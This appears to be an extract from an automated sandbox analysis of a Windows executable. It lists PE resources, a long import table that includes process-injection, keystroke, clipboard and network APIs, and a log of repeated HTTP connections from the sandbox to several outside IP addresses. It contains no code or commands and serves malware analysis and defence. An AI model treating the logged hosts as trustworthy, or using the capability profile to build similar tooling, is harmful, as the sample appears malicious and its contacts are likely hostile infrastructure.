RT_ICON | 0xc69e8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | Great Britain | 0.13858921161825727
RT_ICON | 0xc8f90 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | Great Britain | 0.25070356472795496
RT_ICON | 0xca038 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | Great Britain | 0.3173758865248227
RT_MENU | 0xca4a0 | 0x50 | data | English | Great Britain | 0.9
RT_STRING | 0xca4f0 | 0x594 | data | English | Great Britain | 0.3333333333333333
RT_STRING | 0xcaa84 | 0x68a | data | English | Great Britain | 0.2747909199522103
RT_STRING | 0xcb110 | 0x490 | data | English | Great Britain | 0.3715753424657534
RT_STRING | 0xcb5a0 | 0x5fc | data | English | Great Britain | 0.3087467362924282
RT_STRING | 0xcbb9c | 0x65c | data | English | Great Britain | 0.34336609336609336
RT_STRING | 0xcc1f8 | 0x466 | data | English | Great Britain | 0.3605683836589698
RT_STRING | 0xcc660 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | Great Britain | 0.502906976744186
RT_RCDATA | 0xcc7b8 | 0x57419 | data | | | 1.000324565404126
RT_GROUP_ICON | 0x123bd4 | 0x76 | data | English | Great Britain | 0.6610169491525424
RT_GROUP_ICON | 0x123c4c | 0x14 | data | English | Great Britain | 1.25
RT_GROUP_ICON | 0x123c60 | 0x14 | data | English | Great Britain | 1.15
RT_GROUP_ICON | 0x123c74 | 0x14 | data | English | Great Britain | 1.25
RT_VERSION | 0x123c88 | 0xdc | data | English | Great Britain | 0.6181818181818182
RT_MANIFEST | 0x123d64 | 0x3b0 | ASCII text, with CRLF line terminators | English | Great Britain | 0.5116525423728814
DLL | Import
WSOCK32.dll | __WSAFDIsSet, recv, send, setsockopt, ntohs, recvfrom, select, WSAStartup, htons, accept, listen, bind, closesocket, connect, WSACleanup, ioctlsocket, sendto, WSAGetLastError, inet_addr, gethostbyname, gethostname, socket
VERSION.dll | GetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll | ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_Create, InitCommonControlsEx, ImageList_ReplaceIcon
MPR.dll | WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll | InternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetConnectW, InternetQueryDataAvailable
PSAPI.DLL | GetProcessMemoryInfo
IPHLPAPI.DLL | IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll | UnloadUserProfile, DestroyEnvironmentBlock, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll | IsThemeActive
KERNEL32.dll | HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetCurrentThread, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, DeleteCriticalSection, WaitForSingleObject, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, CloseHandle, GetLastError, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, RaiseException, InitializeCriticalSectionAndSpinCount, InterlockedDecrement, InterlockedIncrement, CreateThread, DuplicateHandle, EnterCriticalSection, GetCurrentProcess, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, HeapSize, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, SetFilePointer, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, HeapReAlloc, WriteConsoleW, SetEndOfFile, DeleteFileW, SetEnvironmentVariableA
USER32.dll | SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, DrawMenuBar, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, MonitorFromRect, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, CopyImage, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, UnregisterHotKey, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, DeleteMenu, PeekMessageW, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, CharLowerBuffW, GetWindowTextW
GDI32.dll | SetPixel, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, GetDeviceCaps, CloseFigure, LineTo, AngleArc, CreateCompatibleBitmap, CreateCompatibleDC, MoveToEx, Ellipse, PolyDraw, BeginPath, SelectObject, StretchBlt, GetDIBits, DeleteDC, GetPixel, CreateDCW, GetStockObject, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, EndPath
COMDLG32.dll | GetSaveFileNameW, GetOpenFileNameW
ADVAPI32.dll | GetAclInformation, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, InitiateSystemShutdownExW, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, SetSecurityDescriptorDacl, AddAce, GetAce
SHELL32.dll | DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll | CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
OLEAUT32.dll | RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, UnRegisterTypeLib, SafeArrayCreateVector, SysAllocString, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, QueryPathOfRegTypeLib, VariantCopy, VariantClear, CreateDispTypeInfo, CreateStdDispatch, DispCallFunc, VariantChangeType, SafeArrayAllocDescriptorEx, VariantInit
Language of compilation system | Country where language is spoken | Map
English | Great Britain |
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                  Nov 14, 2024 15:40:17.708400011 CET4998680192.168.2.5199.59.243.227
                                                                                                                                                  Nov 14, 2024 15:40:17.711007118 CET4998680192.168.2.5199.59.243.227
                                                                                                                                                  Nov 14, 2024 15:40:17.716078997 CET8049986199.59.243.227192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:40:23.045397043 CET4998780192.168.2.5199.59.243.227
                                                                                                                                                  Nov 14, 2024 15:40:23.050957918 CET8049987199.59.243.227192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:40:23.051345110 CET4998780192.168.2.5199.59.243.227
                                                                                                                                                  Nov 14, 2024 15:40:23.102281094 CET4998780192.168.2.5199.59.243.227
                                                                                                                                                  Nov 14, 2024 15:40:23.107464075 CET8049987199.59.243.227192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:40:24.058964014 CET8049987199.59.243.227192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:40:24.058990002 CET8049987199.59.243.227192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:40:24.059180021 CET4998780192.168.2.5199.59.243.227
                                                                                                                                                  Nov 14, 2024 15:40:24.059914112 CET8049987199.59.243.227192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:40:24.059974909 CET4998780192.168.2.5199.59.243.227
                                                                                                                                                  Nov 14, 2024 15:40:24.606550932 CET4998780192.168.2.5199.59.243.227
                                                                                                                                                  Nov 14, 2024 15:40:25.708422899 CET4998880192.168.2.5199.59.243.227
                                                                                                                                                  Nov 14, 2024 15:40:25.789990902 CET8049988199.59.243.227192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:40:25.790076017 CET4998880192.168.2.5199.59.243.227
                                                                                                                                                  Nov 14, 2024 15:40:25.811752081 CET4998880192.168.2.5199.59.243.227
                                                                                                                                                  Nov 14, 2024 15:40:25.816819906 CET8049988199.59.243.227192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:40:26.467685938 CET8049988199.59.243.227192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:40:26.467741966 CET8049988199.59.243.227192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:40:26.467808962 CET4998880192.168.2.5199.59.243.227
                                                                                                                                                  Nov 14, 2024 15:40:26.468099117 CET8049988199.59.243.227192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:40:26.468147039 CET4998880192.168.2.5199.59.243.227
                                                                                                                                                  Nov 14, 2024 15:40:27.325694084 CET4998880192.168.2.5199.59.243.227
                                                                                                                                                  Nov 14, 2024 15:40:28.345062017 CET4998980192.168.2.5199.59.243.227
                                                                                                                                                  Nov 14, 2024 15:40:28.351207972 CET8049989199.59.243.227192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:40:28.351322889 CET4998980192.168.2.5199.59.243.227
                                                                                                                                                  Nov 14, 2024 15:40:28.362704992 CET4998980192.168.2.5199.59.243.227
                                                                                                                                                  Nov 14, 2024 15:40:28.367660999 CET8049989199.59.243.227192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:40:28.367779016 CET8049989199.59.243.227192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:40:28.977226973 CET8049989199.59.243.227192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:40:28.977330923 CET8049989199.59.243.227192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:40:28.977421999 CET4998980192.168.2.5199.59.243.227
                                                                                                                                                  Nov 14, 2024 15:40:28.977924109 CET8049989199.59.243.227192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:40:28.977998972 CET4998980192.168.2.5199.59.243.227
                                                                                                                                                  Nov 14, 2024 15:40:29.872339964 CET4998980192.168.2.5199.59.243.227
                                                                                                                                                  Nov 14, 2024 15:40:30.890866995 CET4999180192.168.2.5199.59.243.227
                                                                                                                                                  Nov 14, 2024 15:40:30.896147966 CET8049991199.59.243.227192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:40:30.896333933 CET4999180192.168.2.5199.59.243.227
                                                                                                                                                  Nov 14, 2024 15:40:30.902249098 CET4999180192.168.2.5199.59.243.227
                                                                                                                                                  Nov 14, 2024 15:40:30.907295942 CET8049991199.59.243.227192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:40:31.521033049 CET8049991199.59.243.227192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:40:31.521059036 CET8049991199.59.243.227192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:40:31.521231890 CET4999180192.168.2.5199.59.243.227
                                                                                                                                                  Nov 14, 2024 15:40:31.521315098 CET8049991199.59.243.227192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:40:31.521364927 CET4999180192.168.2.5199.59.243.227
                                                                                                                                                  Nov 14, 2024 15:40:31.525042057 CET4999180192.168.2.5199.59.243.227
                                                                                                                                                  Nov 14, 2024 15:40:31.530019045 CET8049991199.59.243.227192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:40:36.700817108 CET4999280192.168.2.5209.74.64.58
                                                                                                                                                  Nov 14, 2024 15:40:36.705835104 CET8049992209.74.64.58192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:40:36.705904007 CET4999280192.168.2.5209.74.64.58
                                                                                                                                                  Nov 14, 2024 15:40:36.726937056 CET4999280192.168.2.5209.74.64.58
                                                                                                                                                  Nov 14, 2024 15:40:36.732136011 CET8049992209.74.64.58192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:40:37.381683111 CET8049992209.74.64.58192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:40:37.419275045 CET8049992209.74.64.58192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:40:37.419377089 CET4999280192.168.2.5209.74.64.58
                                                                                                                                                  Nov 14, 2024 15:40:38.231914043 CET4999280192.168.2.5209.74.64.58
                                                                                                                                                  Nov 14, 2024 15:40:39.251003027 CET4999380192.168.2.5209.74.64.58
                                                                                                                                                  Nov 14, 2024 15:40:39.256179094 CET8049993209.74.64.58192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:40:39.256274939 CET4999380192.168.2.5209.74.64.58
                                                                                                                                                  Nov 14, 2024 15:40:39.269735098 CET4999380192.168.2.5209.74.64.58
                                                                                                                                                  Nov 14, 2024 15:40:39.275091887 CET8049993209.74.64.58192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:40:39.943690062 CET8049993209.74.64.58192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:40:39.982498884 CET8049993209.74.64.58192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:40:39.983333111 CET4999380192.168.2.5209.74.64.58
                                                                                                                                                  Nov 14, 2024 15:40:40.778867960 CET4999380192.168.2.5209.74.64.58
                                                                                                                                                  Nov 14, 2024 15:40:41.797683001 CET4999480192.168.2.5209.74.64.58
                                                                                                                                                  Nov 14, 2024 15:40:41.803236008 CET8049994209.74.64.58192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:40:41.803376913 CET4999480192.168.2.5209.74.64.58
                                                                                                                                                  Nov 14, 2024 15:40:41.814821959 CET4999480192.168.2.5209.74.64.58
                                                                                                                                                  Nov 14, 2024 15:40:41.819819927 CET8049994209.74.64.58192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:40:41.819856882 CET8049994209.74.64.58192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:40:42.497665882 CET8049994209.74.64.58192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:40:42.535343885 CET8049994209.74.64.58192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:40:42.535398960 CET4999480192.168.2.5209.74.64.58
                                                                                                                                                  Nov 14, 2024 15:40:43.325735092 CET4999480192.168.2.5209.74.64.58
                                                                                                                                                  Nov 14, 2024 15:40:44.346864939 CET4999580192.168.2.5209.74.64.58
                                                                                                                                                  Nov 14, 2024 15:40:44.351949930 CET8049995209.74.64.58192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:40:44.354327917 CET4999580192.168.2.5209.74.64.58
                                                                                                                                                  Nov 14, 2024 15:40:44.361145020 CET4999580192.168.2.5209.74.64.58
                                                                                                                                                  Nov 14, 2024 15:40:44.366158962 CET8049995209.74.64.58192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:40:45.028980970 CET8049995209.74.64.58192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:40:45.067054033 CET8049995209.74.64.58192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:40:45.067228079 CET4999580192.168.2.5209.74.64.58
                                                                                                                                                  Nov 14, 2024 15:40:45.068142891 CET4999580192.168.2.5209.74.64.58
                                                                                                                                                  Nov 14, 2024 15:40:45.073160887 CET8049995209.74.64.58192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:40:50.557662010 CET4999680192.168.2.547.242.89.146
                                                                                                                                                  Nov 14, 2024 15:40:50.562937975 CET804999647.242.89.146192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:40:50.563024998 CET4999680192.168.2.547.242.89.146
                                                                                                                                                  Nov 14, 2024 15:40:50.575277090 CET4999680192.168.2.547.242.89.146
                                                                                                                                                  Nov 14, 2024 15:40:50.580291986 CET804999647.242.89.146192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:40:51.547610044 CET804999647.242.89.146192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:40:51.591701984 CET4999680192.168.2.547.242.89.146
                                                                                                                                                  Nov 14, 2024 15:40:51.731605053 CET804999647.242.89.146192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:40:51.733167887 CET4999680192.168.2.547.242.89.146
                                                                                                                                                  Nov 14, 2024 15:40:52.095073938 CET4999680192.168.2.547.242.89.146
                                                                                                                                                  Nov 14, 2024 15:40:53.109834909 CET4999780192.168.2.547.242.89.146
                                                                                                                                                  Nov 14, 2024 15:40:53.115282059 CET804999747.242.89.146192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:40:53.115371943 CET4999780192.168.2.547.242.89.146
                                                                                                                                                  Nov 14, 2024 15:40:53.125857115 CET4999780192.168.2.547.242.89.146
                                                                                                                                                  Nov 14, 2024 15:40:53.130974054 CET804999747.242.89.146192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:40:54.075934887 CET804999747.242.89.146192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:40:54.125369072 CET4999780192.168.2.547.242.89.146
                                                                                                                                                  Nov 14, 2024 15:40:54.261301041 CET804999747.242.89.146192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:40:54.263056993 CET4999780192.168.2.547.242.89.146
                                                                                                                                                  Nov 14, 2024 15:40:54.638571024 CET4999780192.168.2.547.242.89.146
                                                                                                                                                  Nov 14, 2024 15:40:55.659028053 CET4999880192.168.2.547.242.89.146
                                                                                                                                                  Nov 14, 2024 15:40:55.664144993 CET804999847.242.89.146192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:40:55.666465998 CET4999880192.168.2.547.242.89.146
                                                                                                                                                  Nov 14, 2024 15:40:55.679090023 CET4999880192.168.2.547.242.89.146
                                                                                                                                                  Nov 14, 2024 15:40:55.684777021 CET804999847.242.89.146192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:40:55.685309887 CET804999847.242.89.146192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:40:56.647399902 CET804999847.242.89.146192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:40:56.700999975 CET4999880192.168.2.547.242.89.146
                                                                                                                                                  Nov 14, 2024 15:40:56.833965063 CET804999847.242.89.146192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:40:56.834028959 CET4999880192.168.2.547.242.89.146
                                                                                                                                                  Nov 14, 2024 15:40:57.185448885 CET4999880192.168.2.547.242.89.146
                                                                                                                                                  Nov 14, 2024 15:40:58.207122087 CET4999980192.168.2.547.242.89.146
                                                                                                                                                  Nov 14, 2024 15:40:58.213125944 CET804999947.242.89.146192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:40:58.213304043 CET4999980192.168.2.547.242.89.146
                                                                                                                                                  Nov 14, 2024 15:40:58.223109007 CET4999980192.168.2.547.242.89.146
                                                                                                                                                  Nov 14, 2024 15:40:58.228131056 CET804999947.242.89.146192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:40:59.211580992 CET804999947.242.89.146192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:40:59.263566971 CET4999980192.168.2.547.242.89.146
                                                                                                                                                  Nov 14, 2024 15:40:59.397878885 CET804999947.242.89.146192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:40:59.398011923 CET4999980192.168.2.547.242.89.146
                                                                                                                                                  Nov 14, 2024 15:40:59.398811102 CET4999980192.168.2.547.242.89.146
                                                                                                                                                  Nov 14, 2024 15:40:59.403642893 CET804999947.242.89.146192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:41:04.441313028 CET5000080192.168.2.5128.65.195.180
                                                                                                                                                  Nov 14, 2024 15:41:04.446440935 CET8050000128.65.195.180192.168.2.5
Nov 14, 2024 15:41:04.446552992 CET | 50000 | 80 | 192.168.2.5 | 128.65.195.180
Nov 14, 2024 15:41:04.457319021 CET | 50000 | 80 | 192.168.2.5 | 128.65.195.180
Nov 14, 2024 15:41:04.462511063 CET | 80 | 50000 | 128.65.195.180 | 192.168.2.5
Nov 14, 2024 15:41:05.990134001 CET | 50000 | 80 | 192.168.2.5 | 128.65.195.180
Nov 14, 2024 15:41:06.016897917 CET | 80 | 50000 | 128.65.195.180 | 192.168.2.5
Nov 14, 2024 15:41:06.017762899 CET | 50000 | 80 | 192.168.2.5 | 128.65.195.180
Nov 14, 2024 15:41:07.006834030 CET | 50001 | 80 | 192.168.2.5 | 128.65.195.180
Nov 14, 2024 15:41:07.012171030 CET | 80 | 50001 | 128.65.195.180 | 192.168.2.5
Nov 14, 2024 15:41:07.012247086 CET | 50001 | 80 | 192.168.2.5 | 128.65.195.180
Nov 14, 2024 15:41:07.024276972 CET | 50001 | 80 | 192.168.2.5 | 128.65.195.180
Nov 14, 2024 15:41:07.029216051 CET | 80 | 50001 | 128.65.195.180 | 192.168.2.5
Nov 14, 2024 15:41:08.529474974 CET | 50001 | 80 | 192.168.2.5 | 128.65.195.180
Nov 14, 2024 15:41:08.580580950 CET | 80 | 50001 | 128.65.195.180 | 192.168.2.5
Nov 14, 2024 15:41:08.638323069 CET | 80 | 50001 | 128.65.195.180 | 192.168.2.5
Nov 14, 2024 15:41:08.638381958 CET | 50001 | 80 | 192.168.2.5 | 128.65.195.180
Nov 14, 2024 15:41:09.547739983 CET | 50002 | 80 | 192.168.2.5 | 128.65.195.180
Nov 14, 2024 15:41:09.567888021 CET | 80 | 50002 | 128.65.195.180 | 192.168.2.5
Nov 14, 2024 15:41:09.568034887 CET | 50002 | 80 | 192.168.2.5 | 128.65.195.180
Nov 14, 2024 15:41:09.579377890 CET | 50002 | 80 | 192.168.2.5 | 128.65.195.180
Nov 14, 2024 15:41:09.584496021 CET | 80 | 50002 | 128.65.195.180 | 192.168.2.5
Nov 14, 2024 15:41:09.584527969 CET | 80 | 50002 | 128.65.195.180 | 192.168.2.5
Nov 14, 2024 15:41:11.092268944 CET | 50002 | 80 | 192.168.2.5 | 128.65.195.180
Nov 14, 2024 15:41:11.097965002 CET | 80 | 50002 | 128.65.195.180 | 192.168.2.5
Nov 14, 2024 15:41:11.098037004 CET | 50002 | 80 | 192.168.2.5 | 128.65.195.180
Nov 14, 2024 15:41:12.110929966 CET | 50003 | 80 | 192.168.2.5 | 128.65.195.180
Nov 14, 2024 15:41:12.116067886 CET | 80 | 50003 | 128.65.195.180 | 192.168.2.5
Nov 14, 2024 15:41:12.116159916 CET | 50003 | 80 | 192.168.2.5 | 128.65.195.180
Nov 14, 2024 15:41:12.122459888 CET | 50003 | 80 | 192.168.2.5 | 128.65.195.180
Nov 14, 2024 15:41:12.127616882 CET | 80 | 50003 | 128.65.195.180 | 192.168.2.5
Nov 14, 2024 15:41:17.271413088 CET | 80 | 50003 | 128.65.195.180 | 192.168.2.5
Nov 14, 2024 15:41:17.326791048 CET | 50003 | 80 | 192.168.2.5 | 128.65.195.180
Nov 14, 2024 15:41:17.367966890 CET | 80 | 50003 | 128.65.195.180 | 192.168.2.5
Nov 14, 2024 15:41:17.368241072 CET | 50003 | 80 | 192.168.2.5 | 128.65.195.180
Nov 14, 2024 15:41:17.381890059 CET | 50003 | 80 | 192.168.2.5 | 128.65.195.180
Nov 14, 2024 15:41:17.388921976 CET | 80 | 50003 | 128.65.195.180 | 192.168.2.5
Nov 14, 2024 15:41:22.463815928 CET | 50004 | 80 | 192.168.2.5 | 217.70.184.50
Nov 14, 2024 15:41:22.469046116 CET | 80 | 50004 | 217.70.184.50 | 192.168.2.5
Nov 14, 2024 15:41:22.469237089 CET | 50004 | 80 | 192.168.2.5 | 217.70.184.50
Nov 14, 2024 15:41:22.481664896 CET | 50004 | 80 | 192.168.2.5 | 217.70.184.50
Nov 14, 2024 15:41:22.487107992 CET | 80 | 50004 | 217.70.184.50 | 192.168.2.5
Nov 14, 2024 15:41:23.281769991 CET | 80 | 50004 | 217.70.184.50 | 192.168.2.5
Nov 14, 2024 15:41:23.326697111 CET | 50004 | 80 | 192.168.2.5 | 217.70.184.50
Nov 14, 2024 15:41:23.389949083 CET | 80 | 50004 | 217.70.184.50 | 192.168.2.5
Nov 14, 2024 15:41:23.390125036 CET | 50004 | 80 | 192.168.2.5 | 217.70.184.50
Nov 14, 2024 15:41:23.995171070 CET | 50004 | 80 | 192.168.2.5 | 217.70.184.50
Nov 14, 2024 15:41:25.005222082 CET | 50005 | 80 | 192.168.2.5 | 217.70.184.50
Nov 14, 2024 15:41:25.010920048 CET | 80 | 50005 | 217.70.184.50 | 192.168.2.5
Nov 14, 2024 15:41:25.010996103 CET | 50005 | 80 | 192.168.2.5 | 217.70.184.50
Nov 14, 2024 15:41:25.022552013 CET | 50005 | 80 | 192.168.2.5 | 217.70.184.50
Nov 14, 2024 15:41:25.028088093 CET | 80 | 50005 | 217.70.184.50 | 192.168.2.5
Nov 14, 2024 15:41:25.854955912 CET | 80 | 50005 | 217.70.184.50 | 192.168.2.5
